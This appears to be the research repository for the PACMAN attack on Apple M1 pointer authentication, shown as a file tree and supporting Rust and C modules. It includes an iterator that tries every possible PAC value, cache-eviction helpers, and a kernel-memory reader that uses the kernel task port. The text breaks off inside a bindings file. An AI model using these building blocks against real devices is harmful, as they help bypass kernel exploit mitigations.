├── .gitignore ├── src ├── libdarwin │ ├── crandom.rs │ ├── iokit.rs │ ├── kernel_rw.rs │ └── mach.rs ├── libdarwin.rs ├── msr.rs ├── attacks.rs ├── qos.rs ├── counter.rs ├── retpoline.rs ├── cache.rs ├── pac.rs ├── timer_multithread.rs ├── timer_msr.rs ├── main.rs ├── attacks │ ├── spectre.rs │ ├── prime_probe.rs │ ├── evict_reload.rs │ └── pacman.rs ├── evset.rs ├── tests.rs └── pacmankit.rs ├── Cargo.toml ├── README.md ├── misc ├── testmsr.c ├── machine_perfmon.h ├── pacman.h └── perfmon.c └── LICENSE /.gitignore: -------------------------------------------------------------------------------- 1 | /target 2 | Cargo.lock 3 | .DS_Store 4 | -------------------------------------------------------------------------------- /src/libdarwin/crandom.rs: -------------------------------------------------------------------------------- 1 | /*! 2 | * C Random methods 3 | */ 4 | 5 | extern "C" { 6 | pub fn rand() -> i32; 7 | pub fn srand(seed: u32); 8 | } 9 | -------------------------------------------------------------------------------- /src/libdarwin.rs: -------------------------------------------------------------------------------- 1 | /*! 2 | * Rust bindings to the various Darwin frameworks we need for PACMAN to work. 3 | */ 4 | 5 | pub mod iokit; 6 | pub mod mach; 7 | pub mod kernel_rw; 8 | pub mod crandom; 9 | -------------------------------------------------------------------------------- /Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "pacman" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | rand = "0.8.5" 10 | -------------------------------------------------------------------------------- /src/msr.rs: -------------------------------------------------------------------------------- 1 | /*! 2 | * Routines for reading MSRs 3 | */ 4 | use core::arch::asm; 5 | 6 | pub unsafe fn read_ctr_el0() -> u64 { 7 | let val : u64; 8 | asm!{ 9 | "mrs {val}, ctr_el0", 10 | val = out(reg) val, 11 | } 12 | return val; 13 | } 14 | -------------------------------------------------------------------------------- /src/attacks.rs: -------------------------------------------------------------------------------- 1 | /*! 2 | * Implementations of the various attacks. 3 | */ 4 | 5 | // Evict+Reload implementation for creating latency graphs 6 | pub mod evict_reload; 7 | 8 | // Prime+Probe testbed for determining effective prime+probe parameters 9 | pub mod prime_probe; 10 | 11 | // Spectre testbed for testing speculative execution in the kernel 12 | pub mod spectre; 13 | 14 | // The actual PACMAN attack code itself 15 | pub mod pacman; 16 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # The PACMAN Attack 2 | PACMAN except in rust! 3 | 4 | ## Experiments 5 | Experiments are launched from `src/main.rs`. You can uncomment the experiment you'd like to run in `attack`. 6 | 7 | ## Build and Run 8 | 9 | `cargo run -r` 10 | 11 | ## Clean 12 | 13 | `cargo clean` 14 | 15 | ## Build Docs 16 | 17 | `cargo doc` 18 | 19 | You can visit `target/doc/pacman/index.html` to see the auto-generated documentation. 20 | 21 | ## Dependencies 22 | 23 | For this to work you'll need a recent version of Rust. [Get Rust here!](https://www.rust-lang.org/tools/install) 24 | -------------------------------------------------------------------------------- /misc/testmsr.c: -------------------------------------------------------------------------------- 1 | // objdump -d testmsr 2 | // Use the hex values of each MSR instruction in Ghidra to find anything in the kernelcache 3 | // that writes to these particular MSRs. Then you can trace those functions via the development 4 | // kernel and XNU sources (assuming no kexts write to the MSR). 5 | int main () { 6 | // PMC0: 7 | asm volatile("msr S3_2_c15_c0_0, x0"); 8 | 9 | // PMCR0: 10 | asm volatile("msr S3_1_c15_c0_0, x0"); 11 | 12 | // PMCR1: 13 | asm volatile("msr S3_1_c15_c1_0, x1"); 14 | 15 | // READ PMCR1: 16 | asm volatile("mrs x2, S3_1_c15_c1_0"); 17 | 18 | // Patch for CNTKCTL_EL1 19 | asm volatile("orr x8,x8,#0x300"); 20 | 21 | // Read CNTKCTL_EL1 22 | asm volatile("msr CNTKCTL_EL1, x8"); 23 | 24 | asm volatile("nop"); 25 | asm volatile("orr x8,x8,#0xf"); 26 | 27 | asm volatile("movk w8, #0x4700, lsl #16"); 28 | 29 | asm volatile("autdza x0"); 30 | asm volatile("autda x0, x1"); 31 | asm volatile("autia x0, x1"); 32 | asm volatile("blr x0"); 33 | asm volatile("autiza x0"); 34 | asm volatile("nop"); 35 | asm volatile("autib x0, x1"); 36 | asm volatile("blraa x0, x1"); 37 | } -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 Joseph Ravichandran, Weon Taek Na, Jay Lang, Mengjia Yan 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /src/libdarwin/iokit.rs: -------------------------------------------------------------------------------- 1 | /*! 2 | * FFI Bindings to the IOKit.framework library. 3 | */ 4 | use std::ffi::c_void; 5 | use std::os::raw::c_char; 6 | use crate::mach; 7 | use mach::{KernReturn, MachPort}; 8 | 9 | pub type IOService = MachPort; 10 | pub type IOName = [c_char;128]; 11 | pub type IOConnect = MachPort; 12 | 13 | pub const IO_OBJECT_NULL : IOService = 0; 14 | 15 | #[link(name = "IOKit", kind="framework")] 16 | extern "C" { 17 | pub static kIOMainPortDefault : MachPort; 18 | pub fn IOServiceGetMatchingService(mainPort : MachPort, cfdictref : *const c_void) -> IOService; 19 | pub fn IOServiceMatching(name: *const i8) -> *const c_void; 20 | pub fn IORegistryEntryGetName(entry: IOService, name: *mut IOName) -> KernReturn; 21 | pub fn IOServiceOpen(service: IOService, owningTask: MachPort, r#type: u32, connect: *mut IOConnect) -> KernReturn; 22 | pub fn IOConnectCallScalarMethod( 23 | connection: IOConnect, 24 | selector: u32, 25 | input: *const u64, 26 | inputCnt: u32, 27 | output: *mut u64, 28 | outputCnt: *mut u32 29 | ) -> KernReturn; 30 | pub fn IOServiceClose(connect: IOConnect) -> KernReturn; 31 | pub fn IOObjectRelease(connect: IOConnect) -> KernReturn; 32 | } 33 | -------------------------------------------------------------------------------- /src/qos.rs: -------------------------------------------------------------------------------- 1 | //! Utilities for pinning a thread to a particular kind of core (P or E core) 2 | use core::arch::asm; 3 | 4 | // sys/qos.h 5 | /** 6 | * Constants for the different kinds of cores on M1. 7 | */ 8 | #[repr(u64)] 9 | pub enum CoreKind { 10 | PCORE = 0x21, // QOS_CLASS_USER_INTERACTIVE 11 | ECORE = 0x09, // QOS_CLASS_BACKGROUND 12 | } 13 | 14 | // See pthread/qos.h 15 | #[link(name = "system")] 16 | extern "C" { 17 | #[doc(hidden)] 18 | pub fn pthread_set_qos_class_self_np(flavor: CoreKind, priority: u64) -> i32; 19 | } 20 | 21 | /** 22 | * Switches the current process onto a different core. 23 | * 24 | * # Arguments 25 | * * `kind`: Which kind of core do we want to run on? 26 | * 27 | * # Return Value 28 | * Returns `true` on success, `false` on failure. 29 | */ 30 | pub unsafe fn set_core(kind: CoreKind) -> bool { 31 | return 0 == pthread_set_qos_class_self_np(kind, 0); 32 | } 33 | 34 | /** 35 | * Returns the current core we are operating on. 36 | * 37 | * Has nothing to do with the pthread qos libraries, but it fits the theme of 38 | * "select a core" so it goes here. 39 | * 40 | * # Return Value 41 | * An integer representing the current core. If this value changes, you switched cores. 42 | */ 43 | pub fn core_id() -> u64 { 44 | unsafe { 45 | let cur_core : u64; 46 | asm!{ 47 | "mrs {cur_core}, TPIDRRO_EL0", 48 | cur_core = out(reg) cur_core, 49 | } 50 | return cur_core & 0x07; 51 | } 52 | } 53 | -------------------------------------------------------------------------------- /src/counter.rs: -------------------------------------------------------------------------------- 1 | /*! 2 | * A dedicated thread for measuring a variable that just counts up. 3 | * 4 | * Surprisingly useful for observing the effects of time (so long 5 | * as all measurements include a serializing sync barrier instruction!) 6 | */ 7 | 8 | use crate::*; 9 | 10 | /** 11 | * A globally visible counter that can be sampled to get a rough measurement of how far time has passed. 12 | * 13 | * Don't forget to synchronize before sampling! 14 | */ 15 | pub static mut CTR : u64 = 0; 16 | 17 | /** 18 | * Continuously increment the counter variable to get a sense of how much time has passed. 19 | */ 20 | pub unsafe fn counter_thread() { 21 | if !set_core(CoreKind::PCORE) { 22 | println!("Error setting CPU affinity!"); 23 | return; 24 | } 25 | loop { 26 | // write_volatile(&mut CTR, read_volatile(&CTR) + 1); 27 | asm!{ 28 | "eor x0, x0, x0", 29 | "1:", 30 | "str x0, [{cnt_addr}]", 31 | "add x0, x0, 1", 32 | "b 1b", 33 | cnt_addr = in(reg) &mut counter::CTR as *mut u64 as u64, 34 | } 35 | } 36 | } 37 | 38 | /** 39 | * Sample the current counter value. Handles all synchronization as appropriate. 40 | * 41 | * DEPRECATED- DO NOT USE 42 | * See timer_multithread.rs instead. 43 | */ 44 | #[inline(always)] 45 | pub unsafe fn read_counter() -> u64 { 46 | asm!{ 47 | "isb" 48 | } 49 | let retval = read_volatile(&CTR); 50 | asm!{ 51 | "isb" 52 | } 53 | 54 | return retval; 55 | } 56 | -------------------------------------------------------------------------------- /src/libdarwin/kernel_rw.rs: -------------------------------------------------------------------------------- 1 | /*! 2 | * Wrapper to activate the kernel read/ write bug we assume we have. 3 | * 4 | * DEPRECATED in favor of the PacmanKit kext (see pacmankit.rs). 5 | */ 6 | use crate::*; 7 | 8 | pub const KERNEL_PID : u64 = 0; 9 | 10 | pub const SYS_KAS_INFO : u64 = 439u64; 11 | 12 | /** 13 | * Returns the kernel slide using kas_info (#439) 14 | * 15 | * Not currently working- we lack the entitlement required to run! 16 | */ 17 | pub unsafe fn sys_kas_info() -> usize { 18 | // KAS_INFO_KERNEL_TEXT_SLIDE_SELECTOR 19 | let selector : u64 = 0; 20 | 21 | let mut val : u64 = 0; 22 | let mut sz : u64 = 8; 23 | 24 | let retval : KernReturn; 25 | 26 | asm!{ 27 | "svc #0", 28 | in("x0") selector, 29 | in("x1") &mut val as *mut u64, 30 | in("x2") &mut sz as *mut u64, 31 | in("x8") SYS_KAS_INFO, 32 | in("x16") SYS_KAS_INFO, 33 | lateout("x0") retval, 34 | } 35 | 36 | if retval != KERN_SUCCESS { 37 | println!("Warning- kas_info failed!"); 38 | } 39 | 40 | return val as usize; 41 | } 42 | 43 | /** 44 | * Reads a virtual address from the kernel. 45 | * 46 | * Here we use a patched kernel to get tfp0 and 47 | * use it to read from kernel memory with the mach vm API. 48 | * 49 | * A real attacker would replace this with their memory corruption bug of choice. 50 | */ 51 | pub unsafe fn kern_read(addr: usize) -> Option { 52 | let mut kernel_task_port : MachPort = 0; 53 | 54 | match task_for_pid(mach_task_self(), KERNEL_PID, &mut kernel_task_port) { 55 | KERN_SUCCESS => {}, 56 | err => { 57 | println!("Error aquiring the kernel task port. Did you forget to run as root? Error string: Error code 0x{:X} ({:?})", err, std::ffi::CStr::from_ptr(mach_error_string(err))); 58 | return None; 59 | } 60 | } 61 | 62 | println!("Aquired the kernel task port! {:X}", kernel_task_port); 63 | 64 | let kas_slide = sys_kas_info(); 65 | println!("Kernel slide is {:X}", kas_slide); 66 | 67 | let mut new_data : *const u8 = 0 as *const u8; 68 | let mut data_count : u64 = 0; 69 | match mach_vm_read( 70 | kernel_task_port, 71 | addr, 72 | 8, 73 | &mut new_data, 74 | &mut data_count 75 | ) { 76 | KERN_SUCCESS => {}, 77 | err => { 78 | println!("Error reading from kernel memory. Error code 0x{:X} ({:?})", err, std::ffi::CStr::from_ptr(mach_error_string(err))); 79 | return None; 80 | } 81 | } 82 | 83 | return None; 84 | } 85 | -------------------------------------------------------------------------------- /misc/machine_perfmon.h: -------------------------------------------------------------------------------- 1 | // Copyright (c) 2020 Apple Inc. All rights reserved. 2 | // 3 | // @APPLE_OSREFERENCE_LICENSE_HEADER_START@ 4 | // 5 | // This file contains Original Code and/or Modifications of Original Code 6 | // as defined in and that are subject to the Apple Public Source License 7 | // Version 2.0 (the 'License'). You may not use this file except in 8 | // compliance with the License. The rights granted to you under the License 9 | // may not be used to create, or enable the creation or redistribution of, 10 | // unlawful or unlicensed copies of an Apple operating system, or to 11 | // circumvent, violate, or enable the circumvention or violation of, any 12 | // terms of an Apple operating system software license agreement. 13 | // 14 | // Please obtain a copy of the License at 15 | // http://www.opensource.apple.com/apsl/ and read it before using this file. 16 | // 17 | // The Original Code and all software distributed under the License are 18 | // distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 19 | // EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 20 | // INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 21 | // FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 22 | // Please see the License for the specific language governing rights and 23 | // limitations under the License. 24 | // 25 | // @APPLE_OSREFERENCE_LICENSE_HEADER_END@ 26 | 27 | #if KERNEL 28 | // Joseph- I added this to match the one in osfmk xnu source 29 | // This file is copied from Kernel.framework and modified as needed 30 | #include 31 | #endif // KERNEL 32 | 33 | // Added stuff 34 | #include 35 | #define PERFMON_SPEC_MAX_EVENT_COUNT (16) 36 | #define PERFMON_SPEC_MAX_ATTR_COUNT (32) 37 | typedef struct perfmon_config *perfmon_config_t; 38 | // End added stuff 39 | 40 | #include 41 | #include 42 | #include 43 | 44 | struct perfmon_counter { 45 | uint64_t pc_number; 46 | }; 47 | 48 | struct perfmon_config { 49 | struct perfmon_source *pc_source; 50 | struct perfmon_spec pc_spec; 51 | unsigned short pc_attr_ids[PERFMON_SPEC_MAX_ATTR_COUNT]; 52 | 53 | struct perfmon_counter *pc_counters; 54 | uint64_t pc_counters_used; 55 | uint64_t pc_attrs_used; 56 | 57 | bool pc_configured:1; 58 | }; 59 | 60 | /// Fill in an array of register values for all units. 61 | void perfmon_machine_sample_regs(enum perfmon_kind kind, uint64_t *regs, 62 | size_t regs_len); 63 | 64 | // Set up the counters as specified by the configuration. 65 | int perfmon_machine_configure(enum perfmon_kind kind, 66 | const perfmon_config_t config); 67 | 68 | // Reset the counters to an inactive state. 69 | void perfmon_machine_reset(enum perfmon_kind kind); 70 | -------------------------------------------------------------------------------- /misc/pacman.h: -------------------------------------------------------------------------------- 1 | #ifndef PACMAN_H 2 | #define PACMAN_H 3 | 4 | #include 5 | #include 6 | 7 | // Pacman header v2 has the patches for the PAC and AUT macros 8 | #define PACMAN_HEADER_VERSION ((2)) 9 | 10 | #define L1_SIZE ((0x20000)) 11 | #define L2_SIZE ((0xC00000)) 12 | 13 | // The bits that make up a PAC 14 | #define PAC_BITMASK ((0xFFFF800000000000ULL)) 15 | 16 | // The important registers for PMC 17 | #define SREG_PMCR0 "S3_1_c15_c0_0" 18 | #define SREG_PMCR1 "S3_1_c15_c1_0" 19 | #define SREG_PMC0 "S3_2_c15_c0_0" 20 | #define SREG_PMC1 "S3_2_c15_c1_0" 21 | 22 | /* 23 | * SREG_WRITE 24 | * Write into an MSR using an instruction barrier afterwords 25 | * MSR[SR] <- V 26 | */ 27 | #define SREG_WRITE(SR, V) \ 28 | __asm__ volatile("msr " SR ", %0 \r\n isb \r\n" : : "r"((uint64_t)V)) 29 | 30 | /* 31 | * SREG_READ 32 | * Read from an MSR without any instruction barriers 33 | * Returns MSR[SR] 34 | */ 35 | #define SREG_READ(SR) \ 36 | ({ \ 37 | uint64_t VAL = 0; \ 38 | __asm__ volatile("mrs %0, " SR " \r\n" : "=r"(VAL)); \ 39 | VAL; \ 40 | }) 41 | 42 | /* 43 | * pac_sign 44 | * Performs PACIA (sign instruction pointer with A key) on addr using 45 | * salt given by salt. 46 | * 47 | * Returns the signed pointer 48 | */ 49 | __attribute__((always_inline)) static inline uint64_t pac_sign(uint64_t addr, uint64_t salt) { 50 | uint64_t result = addr; 51 | asm volatile( 52 | "pacia %[result], %[salt] \n\r" \ 53 | : [result]"+r"(result) 54 | : [salt]"r"(salt) 55 | : 56 | ); 57 | return result; 58 | } 59 | 60 | #define PAC_SIGN(ADDR, SALT) \ 61 | ({ \ 62 | uint64_t PAC_VAL = ADDR; \ 63 | asm volatile("pacia %[result], %[salt] \n\r" : [result]"+r"(PAC_VAL) : [salt]"r"((uint64_t)SALT) : ); \ 64 | PAC_VAL; \ 65 | }) 66 | 67 | /* 68 | * pac_auth 69 | * Performs AUTIA (authenticate instruction pointer with A key) on addr using 70 | * salt given by salt. 71 | * 72 | * Returns the signed pointer 73 | */ 74 | __attribute__((always_inline)) static inline uint64_t pac_auth(uint64_t addr, uint64_t salt) { 75 | uint64_t result = addr; 76 | asm volatile( 77 | "autia %[result], %[salt] \n\r" 78 | : [result]"+r"(result) 79 | : [salt]"r"(salt) 80 | : 81 | ); 82 | return result; 83 | } 84 | 85 | #define PAC_AUTH(ADDR, SALT) \ 86 | ({ \ 87 | uint64_t PAC_VAL = ADDR; \ 88 | asm volatile("autia %[result], %[salt] \n\r" : [result]"+r"(PAC_VAL) : [salt]"r"((uint64_t)SALT) : ); \ 89 | PAC_VAL; \ 90 | }) 91 | 92 | /* 93 | * get_current_core 94 | * Returns the ID of the core that we are currently executing code on. 95 | */ 96 | static uint64_t get_current_core(void) { 97 | return SREG_READ("TPIDRRO_EL0") & 7; 98 | } 99 | 100 | #endif // PACMAN_H 101 | -------------------------------------------------------------------------------- /src/retpoline.rs: -------------------------------------------------------------------------------- 1 | /*! 2 | * Generate a trampoline made of return instructions. 3 | */ 4 | 5 | use crate::*; 6 | 7 | /// The opcode for a return instruction 8 | pub const RET_INST : u32 = 0xd65f03c0; 9 | pub const NOP_INST : u32 = 0xd503201f; 10 | 11 | /** 12 | * Fill a page with `ret` instructions, and make it executable. 13 | * 14 | * # Return Value 15 | * Returns Error on failure, Ok on success. 16 | */ 17 | pub unsafe fn mk_retpoline_page(page: &mut [u8]) -> Result<(), ()> { 18 | if page.len() < cache::PAGE_SIZE { 19 | return Err(()); 20 | } 21 | 22 | let retpoline_ptr = page.as_mut_ptr(); 23 | 24 | match mach_vm_protect( 25 | mach_task_self(), 26 | retpoline_ptr, 27 | cache::PAGE_SIZE, 28 | 0, 29 | (VM_PROT_READ | VM_PROT_WRITE) 30 | ) { 31 | KERN_SUCCESS => {}, 32 | err => { 33 | println!("Error calling mach_vm_protect! Error code 0x{:X} ({:?})", err, std::ffi::CStr::from_ptr(mach_error_string(err))); 34 | return Err(()); 35 | } 36 | } 37 | 38 | let page_as_u32 = core::slice::from_raw_parts_mut(retpoline_ptr as *mut u32, cache::PAGE_SIZE / core::mem::size_of::()); 39 | page_as_u32.fill(RET_INST); 40 | 41 | match mach_vm_protect( 42 | mach_task_self(), 43 | retpoline_ptr, 44 | cache::PAGE_SIZE, 45 | 0, 46 | (VM_PROT_READ | VM_PROT_EXECUTE) 47 | ) { 48 | KERN_SUCCESS => {}, 49 | err => { 50 | println!("Error calling mach_vm_protect! Error code 0x{:X} ({:?})", err, std::ffi::CStr::from_ptr(mach_error_string(err))); 51 | return Err(()); 52 | } 53 | } 54 | 55 | return Ok(()); 56 | } 57 | 58 | /** 59 | * Fill a given memory range with `ret` instructions, and make it executable. 60 | * 61 | * # Return Value 62 | * Returns Error on failure, Ok on success. 63 | */ 64 | pub unsafe fn mk_retpoline_addr(addr: u64, size: usize) -> Result<(), ()> { 65 | let retpoline_ptr = addr as *mut u8; 66 | 67 | match mach_vm_protect( 68 | mach_task_self(), 69 | retpoline_ptr, 70 | size, 71 | 0, 72 | (VM_PROT_READ | VM_PROT_WRITE) 73 | ) { 74 | KERN_SUCCESS => {}, 75 | err => { 76 | println!("Error calling mach_vm_protect! Error code 0x{:X} ({:?})", err, std::ffi::CStr::from_ptr(mach_error_string(err))); 77 | return Err(()); 78 | } 79 | } 80 | 81 | let page_as_u32 = core::slice::from_raw_parts_mut(retpoline_ptr as *mut u32, size / core::mem::size_of::()); 82 | page_as_u32.fill(RET_INST); 83 | 84 | match mach_vm_protect( 85 | mach_task_self(), 86 | retpoline_ptr, 87 | size, 88 | 0, 89 | (VM_PROT_READ | VM_PROT_EXECUTE) 90 | ) { 91 | KERN_SUCCESS => {}, 92 | err => { 93 | println!("Error calling mach_vm_protect! Error code 0x{:X} ({:?})", err, std::ffi::CStr::from_ptr(mach_error_string(err))); 94 | return Err(()); 95 | } 96 | } 97 | 98 | return Ok(()); 99 | } 100 | -------------------------------------------------------------------------------- /src/cache.rs: -------------------------------------------------------------------------------- 1 | /*! 2 | * Routines for interacting with addresses. 3 | */ 4 | 5 | pub const L1D_WAYS : usize = 8; 6 | pub const L1D_SETS : usize = 256; 7 | pub const L1D_LINESIZE : usize = 64; 8 | 9 | pub const L1I_WAYS : usize = 6; 10 | pub const L1I_SETS : usize = 512; 11 | pub const L1I_LINESIZE : usize = 64; 12 | 13 | pub const L2_WAYS : usize = 12; 14 | pub const L2_SETS : usize = 8192; 15 | pub const L2_LINESIZE : usize = 128; 16 | 17 | /// sysctl -a | grep "l2" 18 | pub const L2_SIZE : usize = 0xC00000; 19 | 20 | /// P-Core iCache size 21 | pub const L1I_SIZE : usize = 0x30000; 22 | 23 | /// How large is a page (16KB on M1) 24 | pub const PAGE_SIZE : usize = 0x4000usize; 25 | 26 | /// AND with this constant to get the offset within a page (for 16KB pages) 27 | pub const PAGE_OFFSET_MASK : usize = 0x3FFFusize; 28 | 29 | /// Same as page offset mask except include more VA bits to conflict in TLBs 30 | pub const TLB_OFFSET_MASK : usize = 0x7FFFFFFFFFusize; 31 | 32 | /* 33 | For L2 cache on M1: 34 | 63 20|19 7|6 0| 35 | +------------------+-------------+-------------+ 36 | | Tag | Set | Offset | 37 | +------------------+-------------+-------------+ 38 | 39 | For M1 16KB pages: 40 | |63 14|13 0| 41 | +----------------------------------------------+ 42 | | VPN | Offset | 43 | +----------------------------------------------+ 44 | 45 | Addresses can differ in bits [13:7] and still remain in the same page (but different sets). 46 | There are 2^6 == 64 different cache sets contained within a page. 47 | */ 48 | 49 | /// Returns the L2 cache tag of a given physical address 50 | pub fn get_cache_tag_generic(addr: u64) -> u64 { 51 | let set_shift = (L2_SETS as f64).log2().ceil().round() as u64; 52 | let offset_shift = (L2_LINESIZE as f64).log2().ceil().round() as u64; 53 | return (addr >> (set_shift + offset_shift)); 54 | } 55 | 56 | /// Returns the L2 set index of a given physical address 57 | pub fn get_cache_set_generic(addr: u64) -> u64 { 58 | let offset_shift = (L2_LINESIZE as f64).log2().ceil().round() as u64; 59 | return (addr >> offset_shift) & (L2_SETS as u64 - 1u64); 60 | } 61 | 62 | /// Returns the L2 cache line offset of a given physical address 63 | pub fn get_cache_offset_generic(addr: u64) -> u64 { 64 | return addr & (L2_LINESIZE as u64 - 1u64); 65 | } 66 | 67 | /// Returns the L2 cache tag of a given physical address 68 | /// NOTE: Only works on M1! 69 | #[inline(always)] 70 | pub fn get_cache_tag_m1(addr: u64) -> u64 { 71 | return (addr >> 20) & 0xFFFFFFFFFFF; 72 | } 73 | 74 | /// Returns the L2 set index of a given physical address 75 | /// NOTE: Only works on M1! 76 | #[inline(always)] 77 | pub fn get_cache_set_m1(addr: u64) -> u64 { 78 | return (addr >> 7) & 0xFFFF; 79 | } 80 | 81 | /// For VIPT caches we need to make sure the virtual set index is correct too 82 | #[inline(always)] 83 | pub fn get_l1_cache_set_m1(addr: u64) -> u64 { 84 | return (addr >> 6) & 0x1FF; 85 | } 86 | 87 | /// Returns the L2 cache line offset of a given physical address 88 | /// NOTE: Only works on M1! 89 | #[inline(always)] 90 | pub fn get_cache_offset_m1(addr: u64) -> u64 { 91 | return addr & 0x7F; 92 | } 93 | -------------------------------------------------------------------------------- /src/pac.rs: -------------------------------------------------------------------------------- 1 | /*! 2 | * Utilities for working with pointer authentication codes (PACs) 3 | */ 4 | 5 | /* 6 | 7 | This is what a PAC'ed pointer looks like: 8 | 9 | 63 56| 55 |54 47|46 0| 10 | +-----------+----+----------+---------+ 11 | | PAC[15:5] | EL | PAC[4:0] | Address | 12 | +-----------+----+----------+---------+ 13 | 14 | PAC[15:0]: The 16 bit pointer authentication code 15 | Address: The rest of the address 16 | EL: 1 for kernel pointers, 0 for user pointers 17 | 18 | According to page D5-2656 of the ARM manual: 19 | "The PAC field is Xn[63:56, 54:bottom_PAC_bit]." 20 | */ 21 | 22 | type PAC = u16; 23 | 24 | /// Mask a kernel address with this value to eliminate the PAC 25 | pub const PAC_BITMASK : u64 = 0xFFFF800000000000u64; 26 | 27 | /// Number of possible PACs (2^16 on M1) 28 | pub const NUM_PACS : usize = 0xFFFFusize; 29 | 30 | pub const MAX_PAC : PAC = 0xFFFF; 31 | 32 | /** 33 | * Returns the PAC part of a signed pointer 34 | */ 35 | pub fn extract_pac(signed_pointer: u64) -> PAC { 36 | let pac_lower = (signed_pointer >> 47) & 0x0FF; 37 | let pac_upper = (signed_pointer >> 56) & 0x0FF; 38 | 39 | return ((pac_upper << 8) | pac_lower).try_into().unwrap(); 40 | } 41 | 42 | /** 43 | * Encodes a PAC into a pointer 44 | */ 45 | pub fn encode_pac(pac: PAC, pointer: u64) -> u64 { 46 | let pac_lower = (pac as u64 & 0x0FF) << 47; 47 | let pac_upper = ((pac as u64 >> 8) & 0x0FF) << 56; 48 | 49 | let pac_kernel_bit = if is_kernel_pointer(pointer) {(1 << 55)} else {0}; 50 | 51 | return (pointer & (!PAC_BITMASK)) | pac_lower | pac_upper | pac_kernel_bit; 52 | } 53 | 54 | /** 55 | * Returns true if this is a kernel pointer (bit 52 set), false otherwise. 56 | */ 57 | pub fn is_kernel_pointer(addr: u64) -> bool { 58 | return (addr & (1 << 55)) != 0; 59 | } 60 | 61 | /// An iterator to try every possible PAC value for a given address 62 | pub struct PACIterator{ 63 | /// The current PAC value being considered 64 | cur_pac: PAC, 65 | 66 | /// Have we reported MAX_PAC yet? 67 | reported_last: bool, 68 | 69 | /// The masked pointer to use (kernel or user is fine) 70 | addr: u64, 71 | } 72 | 73 | impl Iterator for PACIterator { 74 | type Item = u64; 75 | 76 | fn next(&mut self) -> Option { 77 | // Whatever self.cur_pac currently is will be what we report 78 | let old_pac = self.cur_pac; 79 | 80 | if self.cur_pac == MAX_PAC { 81 | // If the current PAC is the max one, check if we 82 | // have already returned MAX_PAC before. If so, return None 83 | if self.reported_last { 84 | return None; 85 | } 86 | self.reported_last = true; 87 | } 88 | else { 89 | // Configure next PAC 90 | self.cur_pac = self.cur_pac + 1; 91 | } 92 | 93 | return Some(encode_pac(old_pac, self.addr)); 94 | } 95 | } 96 | 97 | /// Get an iterator to loop over all PAC values for a given pointer 98 | pub fn iterate_pacs(addr: u64) -> PACIterator { 99 | if is_kernel_pointer(addr) { 100 | return PACIterator{ 101 | cur_pac: 0, 102 | reported_last: false, 103 | addr: addr | PAC_BITMASK, 104 | }; 105 | } 106 | else { 107 | return PACIterator{ 108 | cur_pac: 0, 109 | reported_last: false, 110 | addr: addr & (!PAC_BITMASK), 111 | }; 112 | } 113 | } 114 | -------------------------------------------------------------------------------- /src/libdarwin/mach.rs: -------------------------------------------------------------------------------- 1 | /*! 2 | * Bindings to various libsystem mach endpoints. 3 | */ 4 | 5 | pub const VM_PROT_NONE : u64 = 0x00; 6 | pub const VM_PROT_READ : u64 = 0x01; 7 | pub const VM_PROT_WRITE : u64 = 0x02; 8 | pub const VM_PROT_EXECUTE : u64 = 0x04; 9 | 10 | /// (for vm_allocate): Place memory allocation anywhere 11 | pub const VM_FLAGS_ANYWHERE : u64 = 0x0001; 12 | 13 | /// (for vm_allocate): Use huge pages 14 | pub const VM_FLAGS_SUPERPAGE_MASK : u64 = 0x70000; 15 | 16 | pub const KERN_SUCCESS : KernReturn = 0; 17 | 18 | pub type MachPort = u32; 19 | pub type KernReturn = i32; 20 | 21 | #[link(name = "system")] 22 | extern "C" { 23 | /** 24 | * Binding to the mach_absolute_time method from libsystem. 25 | */ 26 | pub fn mach_absolute_time() -> u64; 27 | } 28 | 29 | /** 30 | * Returns a counter that represents the current time. 31 | */ 32 | pub fn gettime() -> u64 { 33 | unsafe { 34 | return mach_absolute_time(); 35 | } 36 | } 37 | 38 | #[link(name = "system")] 39 | extern "C" { 40 | #[doc(hidden)] 41 | static mach_task_self_ : MachPort; 42 | 43 | /** 44 | * Allocate a chunk of memory. 45 | * 46 | * # Arguments 47 | * * `target`: The port to allocate memory on. 48 | * * `addr`: A mutable pointer that will be updated to contain the address of the new memory. 49 | * * `size`: How many bytes to allocate? 50 | * * `flags`: Various flags to control allocation. 51 | * 52 | * # Return Value 53 | * Returns a kernel error return type (`kern_return_t`). If this is not `KERN_SUCCESS`, 54 | * then some sort of error occurred. The error can be viewed with `mach_error_string`. 55 | */ 56 | pub fn mach_vm_allocate(target: MachPort, addr: *mut *mut u8, size: usize, flags: u64) -> KernReturn; 57 | 58 | /** 59 | * Change protections on a chunk of memory. 60 | * 61 | * # Arguments 62 | * * `target`: The port that owns the address. 63 | * * `addr`: Which address to update? 64 | * * `size`: How many bytes to update? 65 | * * `set_max` 